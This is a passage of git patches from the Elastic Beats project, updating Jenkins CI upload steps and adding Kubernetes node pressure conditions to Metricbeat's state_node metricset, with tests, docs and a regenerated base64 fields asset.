mtest.CheckEventField("messages.deleted", "float", event, t) - mtest.CheckEventField("messages.not_visible", "float", event, t) - mtest.CheckEventField("messages.received", "float", event, t) - mtest.CheckEventField("messages.sent", "float", event, t) - mtest.CheckEventField("messages.visible", "float", event, t) - mtest.CheckEventField("oldest_message_age.sec", "float", event, t) - mtest.CheckEventField("sent_message_size", "float", event, t) - mtest.CheckEventField("queue.name", "string", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { From 8064395f7e529247e4a74c7d7a1205e2abe4db13 Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Tue, 16 Feb 2021 12:25:28 +0000 Subject: [PATCH 49/63] [CI] googleStorageUploadExt step (#24048) --- .ci/packaging.groovy | 16 +++++++--------- Jenkinsfile | 19 ++++++++----------- 2 files changed, 15 insertions(+), 20 deletions(-) diff --git a/.ci/packaging.groovy b/.ci/packaging.groovy index 325084ef181f..b90182a5d00d 100644 --- a/.ci/packaging.groovy +++ b/.ci/packaging.groovy @@ -17,6 +17,7 @@ pipeline { JOB_GCS_BUCKET = 'beats-ci-artifacts' JOB_GCS_BUCKET_STASH = 'beats-ci-temp' JOB_GCS_CREDENTIALS = 'beats-ci-gcs-plugin' + JOB_GCS_EXT_CREDENTIALS = 'beats-ci-gcs-plugin-file-credentials' DOCKERELASTIC_SECRET = 'secret/observability-team/ci/docker-registry/prod' DOCKER_REGISTRY = 'docker.elastic.co' GITHUB_CHECK_E2E_TESTS_NAME = 'E2E Tests' @@ -448,14 +449,11 @@ def publishPackages(baseDir){ uploadPackages("${bucketUri}/${beatsFolderName}", baseDir) } -def uploadPackages(bucketUri, baseDir){ - googleStorageUpload(bucket: bucketUri, - credentialsId: "${JOB_GCS_CREDENTIALS}", - pathPrefix: "${baseDir}/build/distributions/", - pattern: "${baseDir}/build/distributions/**/*", - sharedPublicly: true, - showInline: true - ) +def uploadPackages(bucketUri, beatsFolder){ + googleStorageUploadExt(bucket: bucketUri, + credentialsId: "${JOB_GCS_EXT_CREDENTIALS}", + pattern: "${beatsFolder}/build/distributions/**/*", + sharedPublicly: true) } /** @@ -510,4 +508,4 @@ def fixPermissions() { } } } -} \ No newline at end of file +} diff --git a/Jenkinsfile b/Jenkinsfile index 3cee434b6e68..8e8d67c782b7 100644 --- a/Jenkinsfile +++ b/Jenkinsfile @@ -14,6 +14,7 @@ pipeline { DOCKER_REGISTRY = 'docker.elastic.co' JOB_GCS_BUCKET = 'beats-ci-temp' JOB_GCS_CREDENTIALS = 'beats-ci-gcs-plugin' + JOB_GCS_EXT_CREDENTIALS = 'beats-ci-gcs-plugin-file-credentials' OSS_MODULE_PATTERN = '^[a-z0-9]+beat\\/module\\/([^\\/]+)\\/.*' PIPELINE_LOG_LEVEL = 'INFO' PYTEST_ADDOPTS = "${params.PYTEST_ADDOPTS}" @@ -311,13 +312,10 @@ def publishPackages(beatsFolder){ * @param beatsFolder the beats folder. */ def uploadPackages(bucketUri, beatsFolder){ - googleStorageUpload(bucket: bucketUri, - credentialsId: "${JOB_GCS_CREDENTIALS}", - pathPrefix: "${beatsFolder}/build/distributions/", + googleStorageUploadExt(bucket: bucketUri, + credentialsId: "${JOB_GCS_EXT_CREDENTIALS}", pattern: "${beatsFolder}/build/distributions/**/*", - sharedPublicly: true, - showInline: true - ) + sharedPublicly: true) } /** @@ -693,11 +691,10 @@ def archiveTestOutput(Map args = [:]) { */ def tarAndUploadArtifacts(Map args = [:]) { tar(file: args.file, dir: args.location, archive: false, allowMissing: true) - googleStorageUpload(bucket: "gs://${JOB_GCS_BUCKET}/${env.JOB_NAME}-${env.BUILD_ID}", - credentialsId: "${JOB_GCS_CREDENTIALS}", - pattern: "${args.file}", - sharedPublicly: true, - showInline: true) + googleStorageUploadExt(bucket: "gs://${JOB_GCS_BUCKET}/${env.JOB_NAME}-${env.BUILD_ID}", + credentialsId: "${JOB_GCS_EXT_CREDENTIALS}", + pattern: "${args.file}", + sharedPublicly: true) } /** From 125c29d28e1cf718aac4d8589406097707819458 Mon Sep 17 00:00:00 2001 From: Ioannis Androulidakis Date: Tue, 16 Feb 2021 14:29:40 +0200 Subject: [PATCH 50/63] [Metricbeat][Kubernetes] Extend state_node with more conditions (#23905) --- CHANGELOG.next.asciidoc | 1 + metricbeat/docs/fields.asciidoc | 40 +++++++++++++++++++ metricbeat/helper/prometheus/metric.go | 29 ++++++++------ .../helper/prometheus/prometheus_test.go | 33 +++++++++++++-- metricbeat/module/kubernetes/fields.go | 2 +- .../kubernetes/state_node/_meta/fields.yml | 16 ++++++++ .../state_node/_meta/test/ksm.v1.3.0.expected | 3 ++ .../state_node/_meta/test/ksm.v1.8.0.expected | 3 ++ .../kubernetes/state_node/state_node.go | 14 ++++--- 9 files changed, 120 insertions(+), 21 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 8ab8d10c7f2c..5f353ec1b2cf 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -126,6 +126,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - kubernetes.container.cpu.limit.cores and kubernetes.container.cpu.requests.cores are now floats. {issue}11975[11975] - Change types of numeric metrics from Kubelet summary api to double so as to cover big numbers. {pull}23335[23335] - Add container.image.name and containe.name ECS fields for state_container. {pull}23802[23802] +- Add support for the MemoryPressure, DiskPressure, OutOfDisk and PIDPressure status conditions in state_node. {pull}[23905] *Packetbeat* diff --git a/metricbeat/docs/fields.asciidoc b/metricbeat/docs/fields.asciidoc index e3359559097b..4af8bbf459f3 100644 --- a/metricbeat/docs/fields.asciidoc +++ b/metricbeat/docs/fields.asciidoc @@ -29807,6 +29807,46 @@ type: keyword Node unschedulable status +type: boolean + +-- + +*`kubernetes.node.status.memory_pressure`*:: ++ +-- +Node MemoryPressure status + + +type: boolean + +-- + +*`kubernetes.node.status.disk_pressure`*:: ++ +-- +Node DiskPressure status + + +type: boolean + +-- + +*`kubernetes.node.status.out_of_disk`*:: ++ +-- +Node OutOfDisk status + + +type: boolean + +-- + +*`kubernetes.node.status.pid_pressure`*:: ++ +-- +Node PIDPressure status + + type: boolean -- diff --git a/metricbeat/helper/prometheus/metric.go b/metricbeat/helper/prometheus/metric.go index a040ed65dae4..5f3f1199f31e 100644 --- a/metricbeat/helper/prometheus/metric.go +++ b/metricbeat/helper/prometheus/metric.go @@ -79,10 +79,11 @@ type MetricOption interface { Process(field string, value interface{}, labels common.MapStr) (string, interface{}, common.MapStr) } -// OpFilter only processes metrics matching the given filter -func OpFilter(filter map[string]string) MetricOption { - return opFilter{ - labels: filter, +// OpFilterMap only processes metrics matching the given filter +func OpFilterMap(label string, filterMap map[string]string) MetricOption { + return opFilterMap{ + label: label, + filterMap: filterMap, } } @@ -331,18 +332,22 @@ func (m *infoMetric) GetField() string { return "" } -type opFilter struct { - labels map[string]string +type opFilterMap struct { + label string + filterMap map[string]string } -// Process will return nil if labels don't match the filter -func (o opFilter) Process(field string, value interface{}, labels common.MapStr) (string, interface{}, common.MapStr) { - for k, v := range o.labels { - if labels[k] != v { - return "", nil, nil +// Called by the Prometheus helper to apply extra options on retrieved metrics +// Check whether the value of the specified label is allowed and, if yes, return the metric via the specified mapped field +// Else, if the specified label does not match the filter, return nil +// This is useful in cases where multiple Metricbeat fields need to be defined per Prometheus metric, based on label values +func (o opFilterMap) Process(field string, value interface{}, labels common.MapStr) (string, interface{}, common.MapStr) { + for k, v := range o.filterMap { + if labels[o.label] == k { + return fmt.Sprintf("%v.%v", field, v), value, labels } } - return field, value, labels + return "", nil, nil } type opLowercaseValue struct{} diff --git a/metricbeat/helper/prometheus/prometheus_test.go b/metricbeat/helper/prometheus/prometheus_test.go index 974f51f1a10a..f044c2f422f8 100644 --- a/metricbeat/helper/prometheus/prometheus_test.go +++ b/metricbeat/helper/prometheus/prometheus_test.go @@ -397,9 +397,36 @@ func TestPrometheus(t *testing.T) { msg: "Label metrics, filter", mapping: &MetricsMapping{ Metrics: map[string]MetricMap{ - "first_metric": LabelMetric("first.metric", "label4", OpLowercaseValue(), OpFilter(map[string]string{ - "foo": "filtered", - })), + "first_metric": LabelMetric("first.metric", "label4", OpFilterMap( + "label1", + map[string]string{"value1": "foo"}, + )), + }, + Labels: map[string]LabelMap{ + "label1": Label("labels.label1"), + }, + }, + expected: []common.MapStr{ + common.MapStr{ + "first": common.MapStr{ + "metric": common.MapStr{ + "foo": "FOO", + }, + }, + "labels": common.MapStr{ + "label1": "value1", + }, + }, + }, + }, + { + msg: "Label metrics, filter", + mapping: &MetricsMapping{ + Metrics: map[string]MetricMap{ + "first_metric": LabelMetric("first.metric", "label4", OpLowercaseValue(), OpFilterMap( + "foo", + map[string]string{"Filtered": "filtered"}, + )), }, Labels: map[string]LabelMap{ "label1": Label("labels.label1"), diff --git a/metricbeat/module/kubernetes/fields.go b/metricbeat/module/kubernetes/fields.go index aec239344fdc..0b87da7ad9c6 100644 --- a/metricbeat/module/kubernetes/fields.go +++ b/metricbeat/module/kubernetes/fields.go @@ -32,5 +32,5 @@ func init() { // AssetKubernetes returns asset data. // This is the base64 encoded gzipped contents of module/kubernetes. func AssetKubernetes() string { - return "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" + return "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